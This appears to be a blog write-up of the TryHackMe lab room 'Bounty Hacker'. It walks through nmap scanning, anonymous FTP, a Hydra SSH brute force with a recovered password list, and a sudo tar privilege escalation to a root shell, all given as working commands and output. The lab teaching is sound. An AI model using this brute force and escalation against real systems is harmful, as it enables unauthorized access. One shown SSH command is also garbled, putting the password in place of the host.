---
layout: post
title: "Bounty Hacker - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - thm
  - linux
  - eop
  - bruteforce
  - ssh
  - sudo
date: 2021/03/19 20:20:00
thumbnail: /images/TryHackMe/cowboyhacker.jpeg
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Bounty Hacker
- **Profile:** [tryhackme.com](https://tryhackme.com/room/cowboyhacker)
- **Difficulty:** Easy
- **Description**: You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

![Bounty Hacker](/images/TryHackMe/cowboyhacker.jpeg)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap gtfoblookup hydra
```

## Network enumeration

Service scan with nmap:

```plaintext
# Nmap 7.91 scan initiated Fri Mar 19 09:49:15 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.110.117
Nmap scan report for 10.10.110.117
Host is up (0.037s latency).
Not shown: 55529 filtered ports, 10003 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.19.77
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 19 09:57:02 2021 -- 1 IP address (1 host up) scanned in 466.54 seconds
```

## FTP discovery

We can connect to the FTP as anonymous.

```plaintext
$ ftp 10.10.110.117
Connected to 10.10.110.117.
220 (vsFTPd 3.0.3)
Name (10.10.110.117:noraj): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.
ftp> get locks.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
226 Transfer complete.
418 bytes received in 0,0568 seconds (7,19 kbytes/s)
ftp> get task.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0,063 seconds (1,05 kbytes/s)
ftp> quit
221 Goodbye.
```

Two files are stored that we can retrieve.

```plaintext
$ cat locks.txt
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e

$ cat task.txt
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin
```

## SSH bruteforce

We can try to bruteforce the SSH connection with the entries in `locks.txt` as
password and `lin` as username.

```plaintext
$ hydra -l lin -P locks.txt 10.10.110.117 -t 4 ssh
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-19 11:34:19
[DATA] max 4 tasks per 1 server, overall 4 tasks, 26 login tries (l:1/p:26), ~7 tries per task
[DATA] attacking ssh://10.10.110.117:22/
[22][ssh] host: 10.10.110.117   login: lin   password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-19 11:34:28

$ ssh lin@RedDr4gonSynd1cat3

lin@bountyhacker:~/Desktop$ cat user.txt
THM{edited}
```

## EoP

We can run `tar` as root:

```plaintext
lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
```

But tar can be used to execute commands:

```plaintext
$ gtfoblookup linux sudo tar
tar:

    sudo:

        Code: sudo tar -cf /dev/null /dev/null --checkpoint=1
              --checkpoint-action=exec=/bin/sh
```

Let's do that:

```plaintext
lin@bountyhacker:~/Desktop$ sudo -u root /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
/bin/tar: Removing leading `/' from member names
root@bountyhacker:~/Desktop# cd
root@bountyhacker:~# id
uid=0(root) gid=0(root) groups=0(root)
root@bountyhacker:~# cat /root/root.txt 
THM{edited}
```
